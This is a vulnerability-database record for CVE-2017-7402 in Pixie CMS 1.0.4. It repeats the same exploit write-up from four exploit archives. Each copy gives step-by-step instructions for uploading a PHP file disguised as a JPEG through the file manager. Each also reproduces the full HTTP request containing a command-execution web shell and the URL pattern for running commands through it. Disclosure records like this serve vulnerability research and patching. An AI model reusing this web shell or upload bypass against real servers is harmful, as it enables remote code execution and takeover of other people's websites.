ID: CVE-2017-7402 | Type: cve | Reporter: cve@mitre.org | Modified: 2017-08-16T01:29:00
Description
Pixie 1.0.4 allows remote authenticated users to upload and execute arbitrary PHP code via the POST data in an admin/index.php?s=publish&x=filemanager request for a filename with a double extension, such as a .jpg.php file with Content-Type of image/jpeg.
{"zdt": [{"lastseen": "2018-03-06T21:08:33", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2017-04-04T00:00:00", "title": "Pixie 1.0.4 - Arbitrary File Upload Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7402"], "modified": "2017-04-04T00:00:00", "href": "https://0day.today/exploit/description/27490", "id": "1337DAY-ID-27490", "sourceData": "# Exploit Title: File Extension Filter Bypass in File Manager Pixie 1.0.4 With Low Privilege # Google Dork: no\r\n# Date: 02-April-2017\r\n# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial\r\n# Vendor Homepage: http://www.getpixie.co.uk\r\n# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip\r\n# Version: 1.0.4\r\n# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)# CVE-2017-7402\r\n \r\nI. Background:\r\nPixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a \"content management system (cms)\", we prefer to call it as Small, Simple, Site Maker. \r\n \r\nII. Description:\r\nin Pixie CMS have three types for account privilege for upload:\r\n- Administrator - Can access file manager but restricted extension for file upload.\r\n- Client - Can access file manager but restricted extension for file upload.\r\n- User - Cannot access file manager\r\n \r\nGenerally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this \u201cUpload failed. Please check that the folder is writeable and has the correct permissions set\u201d.\r\n \r\nIII. Exploit:\r\nIn this case, we used privilege as client and then access to \u201cfile manager\u201d (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). 
Please follow this step:\r\n \r\n1. Prepare software to intercept (I used burpsuite free edtion).\r\n2. Prepare for real image (our_shell.jpg).\r\n3. Browse your real image on file manager pixie cms and click to upload button.\r\n4. Intercept and change of filename \u201cour_shell.jpg\u201d to be \u201cour_shell.jpg.php\u201d\r\n5. Under of perimeter \u201cContent-Type: image/jpeg\u201d, please change and write your shell. in this example, I use cmd shell.\r\n6. If you done, forward your edit request in burpsuite and the pixie cms will give you information like this \u201cour_shell.jpg.php was successfully uploaded\u201d.\r\n7. PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig)\r\n \r\n\u2014\u2014\u2014\u2014\r\nPOST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1\r\nHost: 192.168.1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager\r\nCookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949\r\nContent-Length: 901\r\n \r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"our_shell.jpg.php\"\r\nContent-Type: image/jpeg\r\n \r\n<?php\r\nif(isset($_REQUEST['cmd'])){\r\n echo \"<pre>\";\r\n $cmd = ($_REQUEST['cmd']);\r\n system($cmd);\r\n echo \"</pre>\";\r\n die;\r\n}\r\n?>\r\n 
\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"file_tags\"\r\n \r\nourshell\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"submit_upload\"\r\n \r\nUpload\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n \r\n102400\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"bb2_screener_\"\r\n \r\n1490835014 192.168.1.6\r\n-----------------------------8321182121675739546763935949--\r\n This is our screenshot from PoC: \r\n| |\r\n| Upload for valid image\r\n |\r\n \r\n \r\n| |\r\n| Change extension and insert your shell\r\n |\r\n \r\n \r\n| |\r\n| Your shell success to upload on server\r\n |\r\n \r\n \r\n| |\r\n| Example command for ipconfig\r\n |\r\n \r\n \r\n| |\r\n| Example command for net user\r\n |\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/27490"}], "exploitdb": [{"lastseen": "2017-04-04T11:17:15", "description": "Pixie 1.0.4 - Arbitrary File Upload. CVE-2017-7402. 
Webapps exploit for PHP platform", "published": "2017-04-02T00:00:00", "type": "exploitdb", "title": "Pixie 1.0.4 - Arbitrary File Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7402"], "modified": "2017-04-02T00:00:00", "id": "EDB-ID:41784", "href": "https://www.exploit-db.com/exploits/41784/", "sourceData": "# Exploit Title: File Extension Filter Bypass in File Manager Pixie 1.0.4 With Low Privilege # Google Dork: no\r\n# Date: 02-April-2017\r\n# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial\r\n# Vendor Homepage: http://www.getpixie.co.uk\r\n# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip\r\n# Version: 1.0.4\r\n# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)# CVE-2017-7402\r\n\r\nI. Background:\r\nPixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a \"content management system (cms)\", we prefer to call it as Small, Simple, Site Maker. \r\n\r\nII. Description:\r\nin Pixie CMS have three types for account privilege for upload:\r\n- Administrator - Can access file manager but restricted extension for file upload.\r\n- Client - Can access file manager but restricted extension for file upload.\r\n- User - Cannot access file manager\r\n\r\nGenerally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this \u201cUpload failed. Please check that the folder is writeable and has the correct permissions set\u201d.\r\n\r\nIII. Exploit:\r\nIn this case, we used privilege as client and then access to \u201cfile manager\u201d (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). Please follow this step:\r\n\r\n1. Prepare software to intercept (I used burpsuite free edtion).\r\n2. 
Prepare for real image (our_shell.jpg).\r\n3. Browse your real image on file manager pixie cms and click to upload button.\r\n4. Intercept and change of filename \u201cour_shell.jpg\u201d to be \u201cour_shell.jpg.php\u201d\r\n5. Under of perimeter \u201cContent-Type: image/jpeg\u201d, please change and write your shell. in this example, I use cmd shell.\r\n6. If you done, forward your edit request in burpsuite and the pixie cms will give you information like this \u201cour_shell.jpg.php was successfully uploaded\u201d.\r\n7. PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig)\r\n\r\n\u2014\u2014\u2014\u2014\r\nPOST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1\r\nHost: 192.168.1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager\r\nCookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949\r\nContent-Length: 901\r\n\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"our_shell.jpg.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\nif(isset($_REQUEST['cmd'])){\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 echo \"<pre>\";\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $cmd = ($_REQUEST['cmd']);\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 system($cmd);\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 echo 
\"</pre>\";\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 die;\r\n}\r\n?>\r\n\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"file_tags\"\r\n\r\nourshell\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"submit_upload\"\r\n\r\nUpload\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n102400\r\n-----------------------------8321182121675739546763935949\r\nContent-Disposition: form-data; name=\"bb2_screener_\"\r\n\r\n1490835014 192.168.1.6\r\n-----------------------------8321182121675739546763935949--\r\n\u00a0This is our screenshot from PoC:\u00a0\r\n| |\r\n| Upload for valid image\r\n |\r\n\r\n\u00a0\r\n| |\r\n| Change extension and insert your shell\r\n |\r\n\r\n\u00a0\r\n| |\r\n| Your shell success to upload on server\r\n |\r\n\r\n\u00a0\r\n| |\r\n| Example command for ipconfig\r\n |\r\n\r\n\u00a0\r\n| |\r\n| Example command for net user\r\n |\r\n\r\n\r\n\r\n\r\nIV. 
Thanks to:\r\n- Alloh SWT\r\n- MyBoboboy\r\n- @rungga_reksya, @dvnrcy, @dickysofficial\r\n- Komunitas IT Auditor & IT Security Kaskus\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/41784/"}], "packetstorm": [{"lastseen": "2017-04-10T01:24:11", "description": "", "published": "2017-04-02T00:00:00", "type": "packetstorm", "title": "Pixie 1.0.4 Shell Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7402"], "modified": "2017-04-02T00:00:00", "id": "PACKETSTORM:141901", "href": "https://packetstormsecurity.com/files/141901/Pixie-1.0.4-Shell-Upload.html", "sourceData": "`# Exploit Title: File Extension Filter Bypass in File Manager Pixie 1.0.4 With Low Privilege # Google Dork: no \n# Date: 02-April-2017 \n# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial \n# Vendor Homepage: http://www.getpixie.co.uk \n# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip \n# Version: 1.0.4 \n# CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)# CVE-2017-7402 \n \nI. Background: \nPixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a \"content management system (cms)\", we prefer to call it as Small, Simple, Site Maker. \n \nII. Description: \nin Pixie CMS have three types for account privilege for upload: \n- Administrator - Can access file manager but restricted extension for file upload. \n- Client - Can access file manager but restricted extension for file upload. \n- User - Cannot access file manager \n \nGenerally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this \u201cUpload failed. Please check that the folder is writeable and has the correct permissions set\u201d. \n \nIII. 
Exploit: \nIn this case, we used privilege as client and then access to \u201cfile manager\u201d (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). Please follow this step: \n \n1. Prepare software to intercept (I used burpsuite free edtion). \n2. Prepare for real image (our_shell.jpg). \n3. Browse your real image on file manager pixie cms and click to upload button. \n4. Intercept and change of filename \u201cour_shell.jpg\u201d to be \u201cour_shell.jpg.php\u201d \n5. Under of perimeter \u201cContent-Type: image/jpeg\u201d, please change and write your shell. in this example, I use cmd shell. \n6. If you done, forward your edit request in burpsuite and the pixie cms will give you information like this \u201cour_shell.jpg.php was successfully uploaded\u201d. \n7. PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig) \n \n\u2014\u2014\u2014\u2014 \nPOST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1 \nHost: 192.168.1.1 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager \nCookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18 \nConnection: close \nContent-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949 \nContent-Length: 901 \n \n-----------------------------8321182121675739546763935949 \nContent-Disposition: form-data; name=\"upload[]\"; filename=\"our_shell.jpg.php\" \nContent-Type: image/jpeg \n \n<?php \nif(isset($_REQUEST['cmd'])){ \necho \"<pre>\"; \n$cmd = ($_REQUEST['cmd']); \nsystem($cmd); \necho \"</pre>\"; \ndie; 
\n} \n?> \n \n-----------------------------8321182121675739546763935949 \nContent-Disposition: form-data; name=\"file_tags\" \n \nourshell \n-----------------------------8321182121675739546763935949 \nContent-Disposition: form-data; name=\"submit_upload\" \n \nUpload \n-----------------------------8321182121675739546763935949 \nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\" \n \n102400 \n-----------------------------8321182121675739546763935949 \nContent-Disposition: form-data; name=\"bb2_screener_\" \n \n1490835014 192.168.1.6 \n-----------------------------8321182121675739546763935949-- \nThis is our screenshot from PoC: \n| | \n| Upload for valid image \n| \n \n \n| | \n| Change extension and insert your shell \n| \n \n \n| | \n| Your shell success to upload on server \n| \n \n \n| | \n| Example command for ipconfig \n| \n \n \n| | \n| Example command for net user \n| \n \n \n \n \nIV. Thanks to: \n- Alloh SWT \n- MyBoboboy \n- @rungga_reksya, @dvnrcy, @dickysofficial \n- Komunitas IT Auditor & IT Security Kaskus \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141901/pixie104-shell.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:43", "description": "\nPixie 1.0.4 - Arbitrary File Upload", "edition": 1, "published": "2017-04-02T00:00:00", "title": "Pixie 1.0.4 - Arbitrary File Upload", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7402"], "modified": "2017-04-02T00:00:00", "id": "EXPLOITPACK:2F57E0E188D69D1E215DC34D3D091F44", "href": "", "sourceData": "# Exploit Title: File Extension Filter Bypass in File Manager Pixie 1.0.4 With Low Privilege # Google Dork: no\n# Date: 02-April-2017\n# Exploit Author: @rungga_reksya, @dvnrcy, @dickysofficial\n# Vendor Homepage: http://www.getpixie.co.uk\n# Software Link: https://us.softpedia-secure-download.com/dl/44791fdde14260bc7a8d08df65bcd048/58db4b5c/700044699/webscripts/php/pixie_v1.04.zip\n# Version: 1.0.4\n# 
CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)# CVE-2017-7402\n\nI. Background:\nPixie is a free, open source web application that will help quickly create your own website. Many people refer to this type of software as a \"content management system (cms)\", we prefer to call it as Small, Simple, Site Maker. \n\nII. Description:\nin Pixie CMS have three types for account privilege for upload:\n- Administrator - Can access file manager but restricted extension for file upload.\n- Client - Can access file manager but restricted extension for file upload.\n- User - Cannot access file manager\n\nGenerally Pixie CMS have restricted extension for file upload and we cannot upload php extension. in normally if we upload php file, Pixie CMS will give information rejected like this \u201cUpload failed. Please check that the folder is writeable and has the correct permissions set\u201d.\n\nIII. Exploit:\nIn this case, we used privilege as client and then access to \u201cfile manager\u201d (http://ip_address/folder_pixie_v1.04/admin/index.php?s=publish&x=filemanager). Please follow this step:\n\n1. Prepare software to intercept (I used burpsuite free edtion).\n2. Prepare for real image (our_shell.jpg).\n3. Browse your real image on file manager pixie cms and click to upload button.\n4. Intercept and change of filename \u201cour_shell.jpg\u201d to be \u201cour_shell.jpg.php\u201d\n5. Under of perimeter \u201cContent-Type: image/jpeg\u201d, please change and write your shell. in this example, I use cmd shell.\n6. If you done, forward your edit request in burpsuite and the pixie cms will give you information like this \u201cour_shell.jpg.php was successfully uploaded\u201d.\n7. 
PWN (http://ip_address/folder_pixie_v1.04/files/other/our_shell.jpg.php?cmd=ipconfig)\n\n\u2014\u2014\u2014\u2014\nPOST /pixie_v1.04/admin/index.php?s=publish&x=filemanager HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.1.1/pixie_v1.04/admin/index.php?s=publish&x=filemanager\nCookie: INTELLI_843cae8f53=ovfo0mpq3t2ojmcphj320geku1; loader=loaded; INTELLI_dd03efc10f=2sf8jl7fjtk3j50p0mgmekpt72; f9f33fc94752373729dab739ff8cb5e7=poro8kl89grlc4dp5a4odu2c05; PHPSESSID=1ml97c15suo30kn1dalsp5fig4; bb2_screener_=1490835014+192.168.1.6; pixie_login=client%2C722b69fa2ae0f040e4ce7f075123cb18\nConnection: close\nContent-Type: multipart/form-data; boundary=---------------------------8321182121675739546763935949\nContent-Length: 901\n\n-----------------------------8321182121675739546763935949\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"our_shell.jpg.php\"\nContent-Type: image/jpeg\n\n<?php\nif(isset($_REQUEST['cmd'])){\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 echo \"<pre>\";\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $cmd = ($_REQUEST['cmd']);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 system($cmd);\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 echo \"</pre>\";\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 die;\n}\n?>\n\n-----------------------------8321182121675739546763935949\nContent-Disposition: form-data; name=\"file_tags\"\n\nourshell\n-----------------------------8321182121675739546763935949\nContent-Disposition: form-data; name=\"submit_upload\"\n\nUpload\n-----------------------------8321182121675739546763935949\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n102400\n-----------------------------8321182121675739546763935949\nContent-Disposition: form-data; name=\"bb2_screener_\"\n\n1490835014 
192.168.1.6\n-----------------------------8321182121675739546763935949--\n\u00a0This is our screenshot from PoC:\u00a0\n| |\n| Upload for valid image\n |\n\n\u00a0\n| |\n| Change extension and insert your shell\n |\n\n\u00a0\n| |\n| Your shell success to upload on server\n |\n\n\u00a0\n| |\n| Example command for ipconfig\n |\n\n\u00a0\n| |\n| Example command for net user\n |\n\n\n\n\nIV. Thanks to:\n- Alloh SWT\n- MyBoboboy\n- @rungga_reksya, @dvnrcy, @dickysofficial\n- Komunitas IT Auditor & IT Security Kaskus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}